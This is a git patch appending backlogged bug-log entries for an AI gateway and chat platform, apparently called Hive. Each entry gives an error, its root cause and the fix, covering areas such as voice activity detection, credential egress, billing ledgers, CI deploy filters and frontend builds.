From 7f85991f3de3b78d89943ffcce8c5df9fad30658 Mon Sep 17 00:00:00 2001 From: Sakib Sadman Shajib Date: Wed, 2 Sep 2026 15:33:37 -0400 Subject: [PATCH] chore: append 197 backlogged buglog entries from merged fix PRs Sweeps every merged PR whose body carried a Buglog entry heading and whose JSON line was not yet on main, going back through PR #787 (167 source PRs total, spanning 2026-06 through 2026-09). Five entries had tags as a comma separated string instead of an array; normalized to match the schema every other entry uses, content unchanged. No existing line touched, append only. Refs #873 --- .wolf/buglog.jsonl | 197 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 197 insertions(+) diff --git a/.wolf/buglog.jsonl b/.wolf/buglog.jsonl index c12d2cb6b..7d9ed4d47 100644 --- a/.wolf/buglog.jsonl +++ b/.wolf/buglog.jsonl @@ -312,3 +312,200 @@ {"id": "BUG-1627", "error_message": "Voice mode never stopped listening: the call overlay held the microphone open for as long as it was open, the overlay stayed on Listening... indefinitely, and no transcription was ever sent", "root_cause": "CallOverlay.svelte decided speech was present with domainData.some((value) => value > 0) against an analyser floored at -55 dBFS, which is an is-the-microphone-on check rather than a speech threshold. Ordinary low frequency room noise clears -55 dBFS in a few bins, so the expression held on nearly every animation frame, lastSoundTime was refreshed forever, the two second silence branch was never reached and mediaRecorder.stop() was never called. The same trigger produces the reported transcription flood in a room whose noise crosses and recrosses the threshold instead of sitting above it.", "fix": "Moved the decision into vendor/open-webui/src/lib/hive/voiceActivity.ts, a pure per-frame reducer measuring the RMS the visualiser already computes against a threshold that tracks the room noise floor and is bounded so it cannot chase itself upwards. Added a hard 30s cap on utterance length so an open microphone is always bounded, and a 250ms minimum so a click is discarded rather than uploaded while a short word survives. The room is measured for 500ms before the first utterance may begin and the floor learns from every idle frame, without which a call opened into an already-loud room recorded and transcribed the noise on a 30s loop. Removed the frequency data and the analyser decibel juggling, which nothing else read. Also closed the per-utterance AudioContext, moved the timers onto a monotonic clock, and bound the frame loop to the recorder it started with.", "tags": ["voice", "call-overlay", "vad", "open-webui-fork", "frontend", "issue-1627"], "date": "2026-09-01"} {"id": "bug-1578-owui-metadata-egress", "date": "2026-09-01", "title": "Open WebUI forwarded Hive's internal __metadata carrier, and so the signed-in user's bearer token, to any non-Hive OpenAI-compatible connection", "error_message": "routers/openai.py::generate_chat_completion pops 'metadata' but never pops '__metadata', so __metadata.upstream_auth (a Bearer Supabase token) is forwarded verbatim to whichever connection owns the resolved model", "root_cause": "__metadata is a Hive-internal carrier written by two places (the hive_jwt_forward Filter and the #1567 task dispatch seam) and removed by none. edge-api's OWUIUnwrap strips it on the way in, but nothing stripped it on the way out of the chat container, so the carrier's safety depended entirely on there being exactly one OpenAI-compatible connection configured. Pointing task.model.external at a model served by a second, vendor connection made every conversation ship the user's credential to that vendor, with no user action.", "fix": "Strip at the connection boundary rather than at the writers. deploy/docker/owui-patches/hive_internal_metadata.py removes the whole __metadata object unless the destination base URL equals OPENAI_API_BASE_URL, which is the one variable hive_rag_env_config.openai_connection_override reconciles the persisted connection row from; upstream's plural OPENAI_API_BASE_URLS is deliberately NOT trusted, because it is upstream's multi-connection form and honouring it would mean trusting every connection listed in it. Unset fails closed, loudly: an ERROR at import naming the variable and the outage, and a distinct ERROR rather than the routine WARNING on every drop in that state. apply_internal_metadata_boundary_1578_patch.py splices the boundary into all five requests that leave routers/openai.py with a body, and asserts that count by walking the AST for calls handing a data or json argument to the HTTP session, pairing sends against boundary calls per function with sends > guards. The first version counted the string literals data=payload, and data=body,, which counts variable NAMES and not calls: review disproved the guarantee with a sixth route spelled data=outgoing, that the patch accepted and the test called green. embeddings and responses had their body serialisation moved below get_openai_connection, because a body serialised before the destination is known cannot be sanitised against it. Two further seams in utils/chat.py have no destination to compare against and drop the carrier outright: generate_direct_chat_completion, which relayed the payload to the caller's own browser over socket.io, and a DEBUG log line that interpolated the whole payload after the Filter had already written the bearer into it. Regression test scripts/test_owui_internal_metadata_boundary.py, in make test-scripts, which performs the sixth-route experiment on every run.", "tags": ["ast-guard", "boundary", "credential-egress", "fail-closed", "issue-1578", "log-hygiene", "open-webui", "owui-patches", "security"]} {"id": "1646-tenant-users-role-promotion-never-backfilled", "date": "2026-09-01", "title": "A promoted workspace co-owner is 403'd by WorkspaceAdminGate because tenant_users.role was never backfilled", "error_message": "Console /console/marketplace and /console/feature-gates render 'Managed by your administrator' for an account whose account_memberships.role is owner", "root_cause": "public.tenant_users.role was write once until PR #1287 taught accounts.Service.UpdateMemberRole to propagate onto it, and the reconciliation that shipped with that PR (20260828_02) corrected only the demotion direction. Every owner promoted before that sync kept a stale MEMBER row, which is the value platform.WorkspaceAdminGate authorizes on, while the console's own page gate reads the account_memberships row that was correctly updated.", "fix": "supabase/migrations/20260901_01_tenant_users_role_promote_backfill.sql promotes the stale rows on business tenants only, guarded exactly like signup.SyncTenantMembershipRole's promotion arm (personal_owner_user_id IS NULL, tu.status ACTIVE, an ACTIVE owner membership on the mapped account, and only tu.role = 'MEMBER'). scripts/check-tenant-role-divergence.sh runs on every deploy and fails on either direction of divergence, since a one time correction plus a best effort sync is what was in place when this was filed. Review round also fixed the writer that was still manufacturing the defect: accounts.Service.AcceptInvitation now goes through the same accounts.Service.syncTenantRole helper as UpdateMemberRole, so an owner invitation accepted after this merges no longer produces a fresh stale-MEMBER row.", "tags": ["authorization", "tenant_users", "account_memberships", "migration", "workspace-admin-gate", "issue-1646", "issue-1245", "issue-1244"]} +{"ts": "2026-08-26", "source": "pr", "error_message": "live rescore found merged greeting+chips invisible: landingPageMode==='chat' accounts skipped Placeholder.svelte for upstream ChatPlaceholder", "root_cause": "two competing placeholder components plus a stored personalisation setting gating the mount, and no build-time assertion covering the landing surface", "fix": "#1193 removed the setting gate; this PR deletes dead ChatPlaceholder and asserts hv-greeting/data-hive-quickstart in the built bundle", "tags": ["open-webui", "frontend", "chat-home", "bundle-assertions"]} +{"ts": "2026-08-25", "error_message": "CI tools capability lane billed deepseek-v4-pro: 150 calls, 30.2M credits burned in one day on uat-test-hive-s-workspace", "root_cause": "HIVE_TOOLS_MODEL still defaulted to the paid deepseek-v4-pro alias across ci.yml, deploy-demo-box sdk-replay, docker-compose and the js suite while the chat lane had already moved to free-pool hive-free", "fix": "all four defaults repointed to deepseek-v4-flash plus a ci.yml guard failing any run whose resolved HIVE_TOOLS_MODEL is deepseek-v4-pro", "tags": ["ci-cost", "billing", "model-defaults"]} +{"date": "2026-08-30", "issue": "1564", "error_message": "About 12 percent of browser chat sends fail with 'hive-free is not available'", "root_cause": "internal/chat/dispatch.go and internal/audio/handler.go each dispatched to LiteLLM with a single bare http.Client.Do call and no retry, while internal/inference/retry.go's dispatchWithRetry (used only by the API-key path) was the layer deploy/litellm/config.yaml's RateLimitErrorRetries: 0 comment assumed existed on every surface", "fix": "exported dispatchWithRetry as inference.DispatchWithRetry and routed both the session-chat dispatcher and the audio multipart-forward handler through it instead of a bare HTTP call; corrected the now-false repo-wide comment in config.yaml", "tags": ["retry", "rate-limit", "free-pool", "chat", "audio", "litellm"]} +{"ts": "2026-08-26T06:45:00Z", "source": "console-currency-format-pr", "error_message": "model detail page rendered missing cache rates on fixed aliases as Unknown while the catalog list rendered the same data as a dash, and the analytics blended price note truncated fractional credits (89.46 shown as 89)", "root_cause": "detail page cache tile and cache table rows called formatModelPrice instead of formatCachePrice, bypassing the documented cache absence policy; blended note used truncating formatCredits for a fractional credits-per-million figure", "fix": "route all detail-page cache surfaces through formatCachePrice with a cache flag on price rows, explain the dash in card copy, switch blended note to formatNumber", "tags": ["web-console", "pricing", "formatting", "parity"]} +{"ts": "2026-08-25", "error_message": "negative credits passed ReserveCredits/ChargeUsage validation and inverted sign into credit_ledger_entries", "root_cause": "postUsageEntry checked only creditsDelta == 0 after sign application, so a negative credits argument produced a positive hold or release entry", "fix": "explicit credits <= 0 refusal added to all four usage posting wrappers before postUsageEntry", "tags": ["money", "validation", "ledger", "fail-closed"]} +{"error_message": "chat model picker showed only 4-6 of 9 live models with no scroll cue, sorted by alias_id ascending", "root_cause": "Selector.svelte's dropdown list container was capped at max-h-64 (256px) with no count, scrollbar affordance, or continuation cue, and filteredItems carried no sort beyond the caller's alias_id-ascending order from /v1/models", "fix": "added a persistent count/continuation footer (hasOverflow-gated, outside the scrollable container) and pinned-first alphabetical sort via a new pure helper vendor/open-webui/src/lib/hive/model-sort.ts", "tags": ["frontend", "owui", "model-picker", "issue-1601"]} +{"date": "2026-08-25", "tags": ["matrix", "edge-api", "routing", "recurrence"], "error_message": "GET /v1/audio/voices and the whole /v1/agent/schedules family returned 404 unknown_endpoint on the live box despite being fully implemented and registered on the mux", "root_cause": "UnsupportedEndpointMiddleware 404s any /v1/ path with no support-matrix.json entry, checked before auth/gate/handler; the two route families shipped (#1079, #1081) without matrix entries, and the existing regression guard (unsupported_integration_test.go, added for the same defect on 2026-07-17) only covered a hand-typed case list that nobody extended for these", "fix": "Added the 8 missing matrix entries (including two more found while auditing: GET /v1/agent/tasks/{task_id}/events and .../files); added a mux-derived boot-time+CI guard (route_recorder.go, assertMatrixCoverage) that fails on any /v1/ pattern the mux actually registers with zero matrix coverage, so a new route can no longer ship unlisted without a human remembering to update a list"} +{"ts": "2026-08-26", "error_message": "auditverifier tamper test corrupted another tenant's hash chain on the shared sequential-run test DB, breaking TestVerifierChainOKReturnsNoMismatch the first time the suite ever ran", "root_cause": "tamper UPDATE targets the globally-first row by seq instead of a row the test owns; suite asserted whole-partition invariants on a shared database without isolating its data", "fix": "resetAuditLog helper DELETEs audit_log around each live test so both hold regardless of run order; suite previously never ran anywhere because of a silent HIVE_TEST_DB_URL skip", "tags": ["test-isolation", "audit-chain", "silent-skip", "never-ran"]} +{"error_message": "post-deploy-verify ledger check fails with HTTP 429 insufficient_quota from /v1/chat/completions", "root_cause": "verify workspace balance 9999 credits fell below the flat 10000 credit chat reservation hold after the first passing run consumed one credit; control-plane answers 409 policy rejection and edge maps it to a 429 whose message mimics an upstream provider quota error", "fix": "operational +10000 credit grant to the verify workspace ledger; PR adds a named balance preflight so the gate reports this condition instead of an upstream-looking 429", "tags": ["billing", "reservation", "fail-closed", "post-deploy-verify", "misleading-error"]} +{"ts": "2026-08-26T09:00:00Z", "error_message": "deepseek-v4-flash cached_tokens=0 on three identical 817-token prompts through the gateway; full-price charges despite supports_cache_read=true", "root_cause": "OpenRouter routed each call to a different endpoint serving the slug (no cache-affinity stickiness engaged because these endpoints report no cache writes); cold endpoint per call means zero prefix-cache hits", "fix": "soft extra_body.provider.order endpoint preference on route-deepseek-v4-flash and route-deepseek-v4-pro in deploy/litellm/config.yaml plus positional CI guard test; fallbacks kept enabled", "tags": ["gateway", "openrouter", "prompt-caching", "billing-honesty"]} +{"ts": "2026-08-24", "error_message": "403 'The agent service is not enabled for this organization' on every Cowork task submission outside hand-seeded tenants", "root_cause": "feature_gate_keys carried no default state, so unset ENABLE_COWORK read false everywhere; only seed-demo-owner.py tenants had rows", "fix": "registry-declared default_enabled column applied when no explicit tenant_settings row exists; ENABLE_COWORK default flipped on by migration 20260824_01", "tags": ["featuregate", "cowork", "tenant-settings"]} +{"error_message": "POST /v1/audio/speech unreachable from chat: OWUI audio.tts.* persisted defaults pointed at api.openai.com with empty key and voice alloy", "root_cause": "TTS half of the persistent-config env reconcile never written; all five audio.tts keys are first-boot-wins persistent config, and edge-api served no /v1/audio/voices so the UI offered alloy-style fallback voices", "fix": "reconcile audio.tts.engine/model/voice/base_url/api_key from env mirroring STT; compose sets AUDIO_TTS_* vars; edge-api serves GET /v1/audio/voices with the provider roster", "tags": ["tts", "owui", "voice", "reconcile", "compose"]} +{"ts": "2026-08-23", "error_message": "ReferenceError: customer_tags is not defined at decodeUsageEventRow", "root_cause": "decoder returned an object using property shorthand for a camelCase local (customerTags) under a snake_case key; vitest page-wiring test surfaced it only when an event row existed", "fix": "explicit customer_tags: customerTags in apps/web-console/lib/control-plane/client.ts", "tags": ["web-console", "usage-logs", "decoder"]} +{"ts": "2026-08-25T02:30:00Z", "source": "issue-1110", "error_message": "/artifacts rendered an eternal Loading shell (parity audit) or a bare 404 with no artifact surface; signed-out visits bounced silently through SSO consent", "root_cause": "the chat frontend shipped no /artifacts route at all; the SPA fallback served the app shell for the unmatched path, so the route was a dead end with no error state", "fix": "new (app)/artifacts index page: streams chats via the NDJSON export endpoint, extracts the same html/css/js groups and svg blocks the chat panel renders, list + sandboxed inline preview + open-in-chat, explicit loading/error/empty states, 20s bounded fetch with visible Retry", "tags": ["open-webui", "frontend", "artifacts", "routing", "issue-1110"]} +{"ts": "2026-08-28", "error_message": "PR #1222 squash-merged as 483ba7983, touched apps/edge-api/** which deploy-demo-box.yml's paths filter matches, and produced no deploy-demo-box run and no CI run whatsoever", "root_cause": "a workflow that never runs does not fail, it is absent, and a green PR page cannot distinguish that from a real skip; not a paths-filter gap (issue #1238 confirms the filter matched), a one-off webhook or workflow-dispatch delivery anomaly with no config to blame", "fix": "added deploy-drift-watchdog.yml, a schedule-triggered (not push-triggered, deliberately, since the same anomaly would silence a push-triggered guard) job comparing main's tip against the last successful deploy-demo-box run's headSha every 30 minutes, quiet on legitimate no-deploy cases (no covered path changed, a deploy already in flight, within a 15-minute grace window) and filing a deduped tracking issue otherwise", "tags": ["ci", "deploy", "observability"]} +{"error_message": "Composer submit on a large paste or attachment silently no-ops: no send, no error, no size guardrail (#1108)", "root_cause": "apps/edge-api/internal/auth/owui_unwrap.go capped buffered metadata extraction at 2 MiB and answered 413 above it while chat bodies carry inlined attachment text; frontend chat:message:error handler set message state without any toast so upstream failures were invisible; the config-based size guard lived only in inputFilesHandler so paste and drag-drop paths calling uploadFileHandler directly bypassed it", "fix": "raised maxOWUIUnwrapBody to 16 MiB with declared Content-Length rejected before reading; uploadFileHandler now enforces $config.file.max_size at attach time on every entry path; chat:message:error toasts bounded error content", "tags": ["composer", "owui-unwrap", "413", "silent-failure", "chat-frontend"]} +{"id": "bug-2026-08-29-checkout-rails-sentinel", "date": "2026-08-29", "title": "Buy-credits modal renders a dead button and an inverted min/max range when no payment rail is configured", "error_message": "checkout/rails returns min_credits=10000000 with max_credits=0; console writes min=\"10000000\" max=\"0\" onto the amount input and leaves Continue to payment permanently disabled with no explanation", "root_cause": "The deployed box has no payment rail credentials, so control-plane reports every rail enabled=false and MostRestrictiveMaxCredits returns its documented 0 sentinel for 'nothing is selectable'. The console treated that sentinel as a purchase ceiling and wrote it straight into the HTML min/max attributes, rendered the purchase form regardless of whether any rail could complete a purchase, and applied its fallback defaults before checking coherence so an omitted bound was fabricated rather than refused.", "fix": "getCheckoutRails judges the purchase bounds raw and rejects an unusable set when a rail is selectable; CheckoutModal branches on whether a purchase is possible and renders an explanation with a next step, plus no amount input and no Continue button, when it is not.", "tags": ["billing", "checkout", "console", "payments", "silent-failure", "frontend"]} +{"date": "2026-08-25", "tags": ["accounting", "billing", "rollup", "cache-tokens"], "error_message": "public.api_key_usage_rollups accumulated zeroes in cache_read_tokens and cache_write_tokens for every finalized reservation while usage_events carried real counts", "root_cause": "the internal finalize HTTP request decoded no cache fields and accounting/service.go passed literal 0 for both cache arguments to RecordUsageFinalization; edge-api's three settlement call sites (sync, streaming, session chat) sent no cache counts either, and neither inference route sent even input/output tokens, so nothing upstream of the rollup write could have supplied real figures", "fix": "added optional CacheReadTokens/CacheWriteTokens to FinalizeReservationInput on both services and threaded the metered counts from every settlement call site (sync via cache.CacheReadTokens/CacheWriteTokens, stream via acc.CachedTokens/CacheWriteTokens, chat via cacheUsage); control-plane forwards max-clamped cache counts into RecordUsageFinalization; input/output tokens now also sent on both inference paths"} +{"ts": "2026-08-23", "error_message": "Chromium is required for browser operations but is not installed", "root_cause": "the agent-engine launcher starts every session with --containall, which replaces HOME with a per-session temp dir, while playwright installed Chromium under /root/.cache/ms-playwright at build time; the vendored check_chromium_available scan covers standard install paths, the HOME cache and PATH but never reads PLAYWRIGHT_BROWSERS_PATH", "fix": "pin PLAYWRIGHT_BROWSERS_PATH=/opt/ms-playwright in deploy/apptainer/agent-engine.def %post and %environment and symlink the downloaded chrome binary to /usr/bin/chromium so the vendored scan finds it regardless of HOME", "tags": ["agent-engine", "apptainer", "playwright", "containment"]} +{"date": "2026-08-30", "error_message": "agent-workspace-coverage job asserted https://chat-hive.scubed.co/agent-workspace and /agent-workspace/auth/sign-in, which both 404 on the live deployment", "root_cause": "the probe spec (apps/web-console/tests/e2e/_probe/agent-workspace-flows.spec.ts) was never repointed when the agent workspace moved into the chat composer as a mode (issue #944, D-045); the standalone apps/agent-console app it targeted at /agent-workspace was retired from the chat origin (PR #951) while the test still asserted the old route", "fix": "rewrote the probe against the composer's Chat/Cowork toggle and pack row, reached through Open WebUI's own OAuth-only sign-in; rewrote agent-workspace-controls.json's ledger to match, floor lowered from 19 to 3 with justification", "tags": ["e2e", "stale-gate", "agent-workspace", "cowork", "issue-1531", "pr-1535"]} +{"error_message": "vendor/open-webui had no entry in deploy-demo-box.yml's push.paths filter; a change under that tree merged to main and triggered no deploy", "root_cause": "the paths filter is a hand-maintained allowlist and the fork's frontend source tree (added when the chat frontend was forked to compile from source) was never added to it, so PR #971 (nav fixes touching only vendor/open-webui) merged clean with zero deploy run", "fix": "added vendor/open-webui/** to the filter; added .github/ci/lint-deploy-paths-filter.mjs (wired into ci.yml's repo-policy-lints required check) which parses every deploy/docker/Dockerfile.*'s COPY/ADD sources against the filter and fails loud on the next missing entry instead of silently never deploying", "tags": ["ci", "deploy", "paths-filter", "open-webui", "recurring"]} +{"date": "2026-08-25", "tags": ["accounting", "billing", "rollup", "hardcoded-zero"], "error_message": "public.api_key_usage_rollups recorded consumed_credits with permanently-zero input_tokens/output_tokens/cache_read_tokens/cache_write_tokens for every finalized reservation", "root_cause": "accounting/service.go FinalizeReservation called apiKeySvc.RecordUsageFinalization with literal 0 for input/output tokens instead of forwarding input.InputTokens/input.OutputTokens, which were already available in scope and used two lines above for the usage_events completed event; the test stub for RecordUsageFinalization discarded its own arguments so no assertion could ever have caught the drop", "fix": "forward max(input.InputTokens,0) and max(input.OutputTokens,0) into RecordUsageFinalization; cache_read_tokens/cache_write_tokens remain 0 because neither finalize HTTP path threads them from edge-api yet (separate, larger gap, not fixed here)"} +{"id": "1171-zero-content-full-price", "ts": "2026-08-26", "error_message": "5 of 6 reasoning prompts on hive-free returned finish_reason=length with empty content and settled as ordinary full-price successes; identical prompts also metered 3 vs 76 prompt tokens across pool members", "root_cause": "load-balanced heterogeneous pool dispatched the caller's max_tokens verbatim, letting reasoning members spend the whole visible budget on hidden reasoning; settlement had no zero-content verdict and trusted provider-reported usage unconditionally", "fix": "per-member reasoning_reserve_tokens inflated into the upstream completion ceiling before dispatch (pool-max surfaced through SelectRoute); sync chat completions retry an empty length-finish once then capture the reservation hold with terminal_usage_confirmed=false plus hive_zero_content_captured_total counter and X-Hive-Upstream-Empty-Content header", "tags": ["billing", "free-pool", "reasoning", "fail-closed", "litellm"]} +{"id": "bug-1660-personal-tenant-admin-referral", "date": "2026-09-02", "title": "A personal tenant's sole owner was told to ask their administrator on the marketplace and feature-gate pages", "error_message": "Managed by your administrator. Ask your workspace owner or administrator if you need a connector enabled.", "root_cause": "The console gated /console/marketplace and /console/feature-gates on current_account.role (public.account_memberships) while the control-plane gates them on public.tenant_users through platform.WorkspaceAdminGate. A personal tenant's sole owner is 'owner' in the first and deliberately 'MEMBER' in the second (signup.insertPersonalMembership), so the page shell rendered, the data fetch was answered 403, and the 403 empty state told a single member workspace to go ask somebody who does not exist.", "fix": "GET /api/v1/viewer now returns workspace_admin, resolved from tenant_users plus the platform-admin overlay, the same two reads WorkspaceAdminGate performs. isWorkspaceAdminViewer reads that field, so the nav entry and the server-side gate agree with the backend; the decode fails closed when the field is absent. Two labels that named an administrator who may not exist were corrected: the read-only feature-gate row and the empty marketplace notice.", "tags": ["console", "rbac", "tenant_users", "account_memberships", "copy", "issue-1660", "pr-pending"]} +{"date": "2026-08-25", "error_message": "AssertionError: expected 'object' to be 'string' at tests/chat-completions/chat-completions.test.ts:36 (response.choices[0].message.content)", "root_cause": "hive-free free-pool member (PR #1115/#1155) returned message.content omitted (null) after burning its max_tokens budget on hidden reasoning; normalizeChatCompletion re-marshaled the nil *string as JSON null instead of coercing it, leaking a non-OpenAI-contract shape to every SDK client", "fix": "apps/edge-api/internal/inference/chat_completions.go: normalizeChatCompletion coerces nil, tool-free message.content to an empty string; tool-call messages with null content are left untouched per the OpenAI contract", "tags": ["free-pool", "chat-completions", "normalization", "sdk-replay", "hive-free"]} +{"date": "2026-08-23", "tags": ["owui", "security", "direct-connections", "review"], "error_message": "PR #1067 claimed direct connections had no honored path after removing the Connections tab, but three chat-user surfaces (root layout models:refresh, root layout's request:chat:completion socket RPC, app layout model prefetch, shared-chat viewer page) still read and forwarded $settings.directConnections", "root_cause": "UI tab removal and the two most visible getModels() call sites were fixed, but the sweep did not cover routes/+layout.svelte, routes/(app)/+layout.svelte, or routes/s/[id]/+page.svelte, all of which also read the same stored setting; the socket RPC handler in routes/+layout.svelte was the actual dispatch mechanism for a direct provider call that bypasses gateway metering entirely", "fix": "stripped directConnections forwarding from the remaining three call sites and made the request:chat:completion socket handler always fail instead of executing a direct completion; added a regression test asserting none of the three files reference directConnections or enable_direct_connections outside comments"} +{"date": "2026-08-25", "title": "Regional Cloudflare edge degradation misread as a total demo outage", "error_message": "curl code 000 after 12s timeout on chat-hive.scubed.co, console-hive.scubed.co, api-hive.scubed.co and the scubed.co apex, from every vantage available to the team, over IPv4 and IPv6", "root_cause": "Cloudflare had Dhaka (DAC) under maintenance and Singapore and Hong Kong, the failover colos for Bangladesh, in active maintenance windows. TLS handshakes for the scubed.co and scubed.com.bd zones hung silently from Bangladesh while the same edge address completed TLS normally for other server names. The surfaces were serving correct payloads to the rest of the internet throughout. Every reachability gate the repo owns runs on the self-hosted runner on the demo box, inside the affected region, so no signal existed that could distinguish a real outage from a local path fault.", "fix": "Added .github/workflows/external-uptime-probe.yml on ubuntu-latest, running every 15 minutes outside the affected region, probing all three public hostnames and printing cf-ray per host. Red means genuinely unreachable, green while the team sees timeouts means the fault is local and cloudflared must not be bounced. No remediating action was taken during the incident itself, which was correct.", "tags": ["cloudflare", "tunnel", "monitoring", "incident", "false-positive", "self-hosted-runner", "observability"]} +{"id": "2026-08-23-owui-svelte-window-in-if-block", "date": "2026-08-23", "title": "svelte:window inside an {#if} block failed the chat frontend build and blocked every demo box deploy", "error_message": "[vite-plugin-svelte] src/lib/hive/AgentSchedules.svelte (175:3): `` tags cannot be inside elements or blocks", "root_cause": "AgentSchedules.svelte placed a tag inside the {#if pendingDelete} block. svelte:window is a compiler level element and is only valid at the top level of a component's markup, so the Svelte 5 compiler rejects it. It merged green because make test-owui-frontend copies only the .ts files out of vendor/open-webui/src/lib/hive and runs vitest over them, and vitest never compiles a .svelte file that no test imports, so no pre-merge check compiled any of the six Hive authored components. The first build that did was the open-webui image build inside deploy-demo-box.", "fix": "Hoisted the tag to the top level of the markup and moved the open-dialog test into the handler. Extended scripts/test-owui-hive-frontend.sh to compile every .svelte file in that directory with the svelte major vendor/open-webui/package.json declares, via scripts/owui-hive-svelte-compile-check.mjs, so the same failure is caught in a required check in about twenty seconds.", "tags": ["svelte", "open-webui", "ci-blind-spot", "deploy-demo-box", "vendor-fork", "build-failure"]} +{"id": "bug-2026-08-17-proof-link-dies-on-branch-delete", "date": "2026-08-17", "title": "PR visual proof rendered fine at review time and then rotted the moment the PR merged", "error_message": "raw.githubusercontent.com////docs/proof/... 404s once is deleted", "root_cause": "Proof images were linked by a raw.githubusercontent.com URL pinned to the PR's own branch name. This repo's merge policy is squash merge with branch deletion, so the branch ref the URL depends on stops existing the moment the PR merges, and the image silently starts 404ing. Nobody notices because proof is read once, at review time, before the branch is gone. Confirmed empirically on scratch PR #959: curl showed a cache MISS 404 straight from origin seconds after git push origin --delete on the branch a raw link had been pinned to.", "fix": "scripts/post-pr-visual-proof.sh uploads every proof image to one permanent, never-deleted GitHub Release (visual-proof-assets) and posts the PR comment with its releases/download/ URL, which is not reachable through any branch at all. Orchestrator rule 8 updated to require this script by name. A commit-SHA-pinned raw link also survives branch deletion but was rejected as the standard since it depends on undocumented GitHub retention behavior and repeats the branch-name mistake one slip away.", "tags": ["visual-proof", "github", "raw-githubusercontent", "release-asset", "link-rot", "pr-867", "d-042"]} +{"id": "bug-2026-08-29-knowledge-nav-row-outlived-its-own-removal-condition", "date": "2026-08-29", "title": "The chat shell still shipped a Knowledge navigation row that D-045 ruling 2 had eliminated", "error_message": "No exception. The deployed sidebar rendered New Chat, Search, Projects, Artifacts, Knowledge, Skills, Scheduled, and the Knowledge row navigated to a live destination the ruling had deleted", "root_cause": "The row was left in HIVE_NAV behind a comment stating one condition for its removal, that Projects did not hold RAG collections yet and removing the row would take away the only way to reach them. That condition was already false when the comment was written: lib/hive/projects/projects.ts is the knowledge collections re-skinned, reading GET /api/v1/knowledge/ in listProjects and writing through createProject, addFileToProject and deleteProject, so both destinations listed the same rows and Projects was the more capable of the two. A deferral condition that nobody re-checked outlived the fact it depended on", "fix": "Removed the knowledge entry from HIVE_NAV in vendor/open-webui/src/lib/hive/nav.ts, dropped the now unreachable glyph from ShellNavIcon.svelte and its arm of the HiveNavIcon union, and rewrote the nav tests to assert the row's absence and that no row lights up on /knowledge. The /knowledge route itself is untouched, unlinked the same way /agents is", "files": ["vendor/open-webui/src/lib/hive/nav.ts", "vendor/open-webui/src/lib/hive/ShellNavIcon.svelte", "vendor/open-webui/src/lib/hive/nav.test.ts", "vendor/open-webui/src/lib/components/layout/Sidebar.svelte"], "tags": ["chat", "navigation", "open-webui-fork", "d-045"], "related_issues": [1502]} +{"timestamp": "2026-08-28T20:40:00Z", "error_message": "streaming content_block_start omits text field, crashing the real Anthropic SDK's own stream accumulator on every text response", "root_cause": "StreamContentBlock.Text carries json:\"text,omitempty\" in apps/edge-api/internal/anthropic/types.go; a text content_block_start always constructs Text:\"\", so omitempty drops the key entirely, leaving the SDK's typed content.text as None before the first += delta append", "fix": "tracked as issue #1274, not yet fixed on this branch (test-only PR, marked xfail)", "tags": ["anthropic", "streaming", "sdk-conformance", "edge-api"]} +{"ts": "2026-08-28", "error_message": "docker compose run --build web-console npm run build in one worktree recreated hive-control-plane-1 belonging to a different worktree, crashing it (no SUPABASE_URL) and leaving it DB-degraded after restore", "root_cause": "docker-compose.yml pins the compose project name to name: hive repo-wide; every git worktree checkout resolves the same project, so any documented docker compose command from any worktree shares one container namespace and can recreate a peer worktree's containers with whatever env that invocation happened to resolve", "fix": "scripts/set-compose-project-name.sh derives a per-worktree COMPOSE_PROJECT_NAME (worktree basename + short hash of its path) and writes it to deploy/docker/.env (default env discovery, used by --env-file-less commands) and the repo-root .env (used by --env-file ../../.env commands), covering both documented command shapes; no-ops on the canonical hive checkout (demo box, CI); --check mode detects a live collision and names the colliding directory (PR #1249)", "tags": ["docker-compose", "worktree", "infra", "ops"]} +{"date": "2026-08-18", "error_message": "Folders and Recents sidebar sections appear to never populate", "root_cause": "Sidebar.svelte defaults localStorage.sidebar to collapsed for a first-time visitor (localStorage.sidebar === 'true' check), hiding Folders/Recents with no visible affordance to expand; both sections were already correctly wired to getFolders/getChatList", "fix": "Default sidebar to expanded when no explicit prior choice exists (sidebarDefaultExpanded in vendor/open-webui/src/lib/hive/sidebar-default.ts), preserving an explicit collapse/expand choice on later visits; also removed the vestigial 'Chats' nav row whose href duplicated New Chat", "tags": ["owui", "sidebar", "nav", "frontend"]} +{"id": "bug-mt0swc01-9d41e2", "timestamp": "2026-08-25T00:00:00.000Z", "related_bugs": [], "occurrences": 1, "last_seen": "2026-08-25T05:24:24.170Z", "title": "Deploy image build silently lost @next/swc-linux-x64-gnu then crashed on missing pnpm", "error_message": "/bin/sh: 1: pnpm: not found + unhandledRejection [Error: Failed to get registry from \"pnpm\".] during RUN npm run build in Dockerfile.web-console.prod, deploy-demo-box run 32812392124 job Pull + recreate stack on the demo box", "root_cause": "npm treats a failed install of an optional dependency as nonfatal and logs it only at verbose level (arborist reify.js trash-list path), so one transient fetch failure of the 137MB @next/swc-linux-x64-gnu tarball during the box's parallel multi-service compose build yielded a clean looking added-587-packages tree with no binary (healthy install = 588 packages plus swc-linux-x64-gnu). next build then fell back to its runtime swc downloader which probes pnpm config get registry first and crashed with unhandledRejection because pnpm is absent from node:24-slim. Cache luck had hidden this since PR #811 changed package.json.", "fix": "Dockerfile.web-console.prod, dev Dockerfile.web-console and Dockerfile.agent-console now run npm ci --include=optional in a three-attempt retry loop whose success condition asserts node_modules/@next/swc-linux-x64-gnu/next-swc.linux-x64-gnu.node exists, with a final loud assert after the loop. Verified: prod target builds green end to end, CI sanity command docker compose run --build web-console npm run build passes, agent-console builds, guard validated on both current and box-exact node:24-slim digests.", "tags": ["docker", "nextjs", "swc", "npm-optional-deps", "silent-failure", "deploy-demo-box"]} +{"date": "2026-08-17", "error_message": "real Anthropic SDK client 401s with 'missing bearer' regardless of API key validity when pointed at Hive with only base_url and api_key set", "root_cause": "authSelectorMiddleware inspects only the Authorization header and runs outside the mux; anthropic.APIKeyNormalizer (x-api-key -> Authorization: Bearer) was wired only at the mux leaf for /v1/messages, so it never ran before the selector's routing decision", "fix": "apply anthropic.APIKeyNormalizer around the selector itself in authSelectorMiddleware (apps/edge-api/cmd/server/main.go), before auth.Selector inspects Authorization", "tags": ["anthropic", "auth", "edge-api", "x-api-key", "routing"]} +{"error_message": "ModuleNotFoundError: No module named 'httpx' during pytest collection in packages/sdk-tests/python", "root_cause": "pyproject.toml pinned openai>=2.30.0 unbounded; pip resolved openai 3.0.0, whose 3.x line renamed its transitive HTTP client dependency from httpx to httpx2, silently dropping the httpx module that sdk-tests-python's 